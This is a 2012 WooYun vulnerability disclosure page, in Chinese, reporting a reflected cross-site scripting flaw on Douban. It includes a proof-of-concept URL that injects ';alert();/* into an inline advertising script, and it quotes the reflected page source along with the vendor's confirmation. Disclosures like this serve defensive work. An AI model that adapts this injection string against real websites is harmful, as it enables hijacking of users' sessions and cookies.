当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011085

漏洞标题:Douban反射型跨站

相关厂商:豆瓣

漏洞作者: free

提交时间:2012-08-20 11:00

修复时间:2012-10-04 11:01

公开时间:2012-10-04 11:01

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-20: 细节已通知厂商并且等待厂商处理中
2012-08-23: 厂商已经确认,细节仅向厂商公开
2012-09-02: 细节向核心白帽子及相关领域专家公开
2012-09-12: 细节向普通白帽子公开
2012-09-22: 细节向实习白帽子公开
2012-10-04: 细节向公众公开

简要描述:

http://guangzhou.douban.com/

详细说明:

可能会窃取或操纵客户会话和 cookie,它们可能用于模仿合法用户,从而使黑客能够以该用户身份查看或变更用户记录以及执行事务

漏洞证明:


view-source:http://beijing.douban.com/?';alert();/*

<script type="text/javascript">
(function (global) {
var newNode = global.document.createElement('script'),
existingNode = global.document.getElementsByTagName('script')[0],
adSource = 'http://erebor.douban.com/',
userId = '2025898',
browserId = 'S/AE5RYypw4',
ipAddress = '114.254.41.32',
criteria = '3:/?';alert();/*',
preview = '',
debug = false,
adSlots = ['dale_location_home_top_right'];
global.DoubanAdRequest = {src: adSource, uid: userId, bid: browserId, ip: ipAddress, crtr: criteria, prv: preview, debug: debug};
global.DoubanAdSlots = (global.DoubanAdSlots || []).concat(adSlots);
newNode.setAttribute('type', 'text/javascript');
newNode.setAttribute('src', 'http://img3.douban.com/js/packed_ad533989358.js');
newNode.setAttribute('async', true);
existingNode.parentNode.insertBefore(newNode, existingNode);
})(this);
</script>

修复方案:

清理用户输入,并过滤出代码。

版权声明:转载请注明来源 free@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-08-23 13:20

厂商回复:

立即组织修复,谢谢~

最新状态:

暂无


漏洞评价:

评论